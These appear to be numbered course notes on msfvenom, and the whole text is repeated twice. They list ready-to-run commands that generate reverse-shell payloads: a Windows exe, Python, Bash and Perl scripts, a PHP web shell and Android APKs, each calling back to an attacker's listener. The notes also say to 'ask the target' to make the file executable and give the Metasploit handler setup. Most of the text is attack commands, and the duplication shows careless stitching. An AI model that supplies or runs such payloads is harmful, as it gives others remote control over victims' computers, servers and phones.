g2 s9 msfven

1. Grade 2 Session 9
2. ===================
3.  
4. MSFVENOM : Which createsd payloads and binds up the encoding function in that.
5. Msfpayload and Msfencoder in 2015 they both get binded up in one single functionality known as MSFVENOM.
6.  
7. We use Msfvenom outside the platform of MSFConsole, cause msfconsole will only provides listening on the reverse connection via exploits.
8.  
9.  
10. 1. Application based Payload : Windows (.exe)
11.  
12. Microsoft Operating System ---> exe ---> file.exe ---> executable
13.  
14.  
15. msfvenom -p windows/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.80 -f exe > /root/Desktop/lol.exe
16.  
17. > which we will make executable
18.  
19. 2. Python Based Exploit for Unix/Linux System
20.  
21. msfvenom -p cmd/unix/reverse_python lport=1337 lhost=192.168.0.80 -f raw > /root/Desktop/pyth.py
22.  
23. Dependencies :
24. Transfer pyth.py in the target machine.
25. Ask the target to make it executable by typing
26. chmod 777 pyth.py
27.  
28. 3. Bash Based Payload for Linux/Unix
29.  
30. msfvenom -p cmd/unix/reverse_bash lport=1337 lhost=192.168.0.80 -f raw > /root/Desktop/lmao.sh
31.  
32. Transfer lmao.sh in the target machine.
33. Ask the target to make it executable by typing
34. chmod 777 lmao.sh
35.  
36. 4. Perl Based Payload For Linux/Unix (Runs Perfect on MAC)
37.  
38. msfvenom -p cmd/unix/reverse_perl lport=1337 lhost=192.168.0.132 -f raw > /root/Desktop/troll.pl
39.  
40. Transfer troll.pl in the target machine.
41. Ask the target to make it executable by typing
42. chmod 777 troll.pl
43.  
44. 5. Creating a PHP Shell For Servers
45.  
46. msfvenom -p php/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.132 -f raw > /root/Desktop/website.php
47.  
48. 6. Exploit Android/Smart Phones using metasploit using tcp
49.  
50. msfvenom -p android/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.132 R > /root/Desktop/mobile.apk
51.  
52. 7. Exploit Android/Smart Phones using metasploit using HTTPS
53.  
54. msfvenom -p android/meterpreter/reverse_https lport=1337 lhost=192.168.0.132 R > /root/Desktop/phone.apk
55.  
56. FOR ALL THESE, USING METASPLOIT FRAMEWORK LISTENER TO LISTEN THE REVERSE CONNECTION :
57.  
58. > Open MSF = msfconsole
59. > Use Exploit = use exploit/multi/handler (A wildcard Exploit which can be used for listening to the reverse connection.)
60. > msfconsole
61. use exploit/multi/handler
62. set payload PAYLOADNAME
63. show options
64. set lport PORTADDRESSFORLISTENING
65. set lhost IPADDRESSFORLISTENING
66. show options
67. exploit
68.  
69.  
70. -----------------------------------------------------------------------
71.  
72. After Meterpreter,
73.  
74. meterpreter> ? (Show Options)
75. meterpreter> Use Commands
76.  
77. -----------------------------------------------------------------------
78.  
79. MOBSF (Mobile Security Framework)Grade 2 Session 9
80. ===================
81.  
82. MSFVENOM : Which createsd payloads and binds up the encoding function in that.
83. Msfpayload and Msfencoder in 2015 they both get binded up in one single functionality known as MSFVENOM.
84.  
85. We use Msfvenom outside the platform of MSFConsole, cause msfconsole will only provides listening on the reverse connection via exploits.
86.  
87.  
88. 1. Application based Payload : Windows (.exe)
89.  
90. Microsoft Operating System ---> exe ---> file.exe ---> executable
91.  
92.  
93. msfvenom -p windows/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.80 -f exe > /root/Desktop/lol.exe
94.  
95. > which we will make executable
96.  
97. 2. Python Based Exploit for Unix/Linux System
98.  
99. msfvenom -p cmd/unix/reverse_python lport=1337 lhost=192.168.0.80 -f raw > /root/Desktop/pyth.py
100.  
101. Dependencies :
102. Transfer pyth.py in the target machine.
103. Ask the target to make it executable by typing
104. chmod 777 pyth.py
105.  
106. 3. Bash Based Payload for Linux/Unix
107.  
108. msfvenom -p cmd/unix/reverse_bash lport=1337 lhost=192.168.0.80 -f raw > /root/Desktop/lmao.sh
109.  
110. Transfer lmao.sh in the target machine.
111. Ask the target to make it executable by typing
112. chmod 777 lmao.sh
113.  
114. 4. Perl Based Payload For Linux/Unix (Runs Perfect on MAC)
115.  
116. msfvenom -p cmd/unix/reverse_perl lport=1337 lhost=192.168.0.132 -f raw > /root/Desktop/troll.pl
117.  
118. Transfer troll.pl in the target machine.
119. Ask the target to make it executable by typing
120. chmod 777 troll.pl
121.  
122. 5. Creating a PHP Shell For Servers
123.  
124. msfvenom -p php/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.132 -f raw > /root/Desktop/website.php
125.  
126. 6. Exploit Android/Smart Phones using metasploit using tcp
127.  
128. msfvenom -p android/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.132 R > /root/Desktop/mobile.apk
129.  
130. 7. Exploit Android/Smart Phones using metasploit using HTTPS
131.  
132. msfvenom -p android/meterpreter/reverse_https lport=1337 lhost=192.168.0.132 R > /root/Desktop/phone.apk
133.  
134. FOR ALL THESE, USING METASPLOIT FRAMEWORK LISTENER TO LISTEN THE REVERSE CONNECTION :
135.  
136. > Open MSF = msfconsole
137. > Use Exploit = use exploit/multi/handler (A wildcard Exploit which can be used for listening to the reverse connection.)
138. > msfconsole
139. use exploit/multi/handler
140. set payload PAYLOADNAME
141. show options
142. set lport PORTADDRESSFORLISTENING
143. set lhost IPADDRESSFORLISTENING
144. show options
145. exploit
146.  
147.  
148. -----------------------------------------------------------------------
149.  
150. After Meterpreter,
151.  
152. meterpreter> ? (Show Options)
153. meterpreter> Use Commands
154.  
155. -----------------------------------------------------------------------
156.  
157. MOBSF (Mobile Security Framework)